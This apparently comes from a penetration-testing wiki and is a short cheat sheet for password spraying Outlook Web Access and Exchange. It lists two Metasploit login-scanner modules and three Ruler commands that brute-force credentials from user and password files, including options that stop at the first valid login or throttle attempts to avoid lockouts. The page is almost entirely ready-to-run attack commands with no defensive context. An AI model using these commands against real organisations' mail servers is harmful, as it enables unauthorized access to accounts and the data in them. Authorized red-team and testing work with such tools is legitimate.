Outlook Web Access (OWA)

Password Spraying OWA

Metasploit

# OWA brute force utility
use auxiliary/scanner/http/owa_login

# OWA Exchange Web Services (EWS) login scanner
use auxiliary/scanner/http/owa_ews_login

Ruler

# Brute force credentials
./ruler --domain $domain brute --users $userfile --passwords $passwordfile

# Stop after first valid credentials found
./ruler --domain $domain brute --users $userfile --passwords $passwordfile --stop

# Brute force credentials with a delay
./ruler --domain $domain brute --users $userfile --passwords $passwordfile --delay 2 --attempts 2

References

Last updated